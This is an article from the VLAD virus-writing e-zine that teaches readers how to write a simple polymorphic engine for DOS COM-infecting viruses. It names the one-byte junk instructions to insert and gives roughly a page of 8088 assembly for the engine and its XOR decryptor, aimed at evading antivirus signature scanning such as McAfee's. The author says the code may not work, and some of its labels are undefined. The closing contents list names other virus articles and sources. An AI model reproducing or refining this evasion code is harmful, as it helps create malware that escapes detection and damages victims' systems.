Virus Labs & Distribution
VLAD AF - Stupid Poly guide

                Qarks Guide to Stupid Polymorphic Engines

 All virus writers who reach the level of direct action COM infector have
 a similar question, "how do I write a polymorphic engine?".  As I will
 show you, writing a crappy little engine is easy, and is highly effective
 against the more stupid AV software which doesn't contain decent emulation,
 such as McAfee Virus Scan.

 As you might know, there are some one byte do-nothing instructions in
 8088 assembly language that are perfect for use in polymorphism. These
 are NOP, CLC, CLD, CLI, CMC, HLT, STC, STD, STI.  There are some others,
 but for various reasons they aren't quite as good.  Anyway, the basic
 principle behind it is to wack a mob of these bytes in-between every
 'real' instruction in the decryption loop, thus wrecking any basic
 signature scanning.

 The design of the engine is something like:

        write garbage (one byte stuff)
        write real instruction
        write garbage
        write real instruction

 Here's some code I've whipped up off the top of my head:

poly_eng        proc    near
;on entry di=place to put encrypted virus + decryptor
;         cx=virus size
;         bp=delta offset
;         si=virus
;on return cx=size of virus+decryptor

        mov     word ptr dec1+1,cx
        in      al,40h
        mov     byte ptr dec2+1,al
        mov     word ptr dec3+1,bp
        mov     word ptr origdi,di

        call    random

        mov     ax,word ptr dec1
        mov     word ptr [di],ax
        add     di,2
        mov     al,byte ptr dec1+2
        mov     byte ptr [di],al
        inc     di

        call    random

        mov     ax,word ptr dec2
        mov     word ptr [di],ax
        add     di,2

        call    random

        mov     word ptr viroff,di
        mov     ax,word ptr dec3
        mov     word ptr [di],ax
        add     di,2
        mov     al,byte ptr dec3+2
        mov     byte ptr [di],al
        inc     di

        call    random

        mov     word ptr loopoff,di
        mov     ax,word ptr dec4
        mov     word ptr [di],ax
        add     di,2
        mov     al,byte ptr dec4+2
        mov     byte ptr [di],al
        inc     di

        call    random

        mov     ax,word ptr dec5
        mov     word ptr [di],ax
        add     di,2

        call    random

        mov     al,byte ptr dec6
        mov     byte ptr [di],al
        inc     di

        call    random

        mov     al,byte ptr dec6
        mov     byte ptr [di],al
        add     di,2

        mov     ax,word ptr loopoff
        sub     ax,di
        mov     byte ptr [di-1],al

        push    di
        sub     di,word ptr origdi
        mov     ax,di
        mov     di,word ptr viroff
        add     word ptr [di],ax
        pop     di

        mov     cx,word ptr dec1+1
        mov     al,byte ptr dec2+1
        mov     ah,byte ptr [si]
        xor     ah,al
        mov     byte ptr [di],ah
        ror     al,1
        inc     si
        inc     di
        loop    encvirus

        sub     di,word ptr origdi
        mov     cx,di

poly_eng        endp

random  proc    near
        in      ax,40h
        mov     cx,ax
        and     cx,7
        in      ax,40h
        and     ax,7
        mov     si,offset bytetable
        add     si,ax
        mov     al,byte ptr [si]
        mov     byte ptr [di],al
        inc     di
        loop    writetrash
random  endp

viroff  dw      0
origdi  dw      0
loopoff dw      0


        mov     cx,1234h                ;Virus Size
        mov     al,99h                  ;Cipher Value
        mov     si,1234h                ;Start of virus code
        xor     byte ptr cs:[si],al     ;The actual decryption
        ror     al,1
        inc     si
        loop    dec4

 I'll explain what I've done there.  The "random" routine writes from
 0-7 bytes of garbage to [DI], so in-between writing the real instructions
 I call that routine.  "Bytetable" is the garbage bytes used by "random"
 and dec1 to dec8 is bascially the decryptor used.  At the end I patch
 the virus pointer value so that it will point to the encrypted virus.

 I'm not even sure if that code will work, and it's very poorly written
 but if you go through it you'll work out what I'm trying to do.

 If you want to see further examples of stupid polymorphic engines,
 pinworm is exceptionally stupid in its polymorphics, and the secret
 area in VLAD#6 has some code which is super-tiny compared to what
 I've done here.



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Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus


VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad


ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

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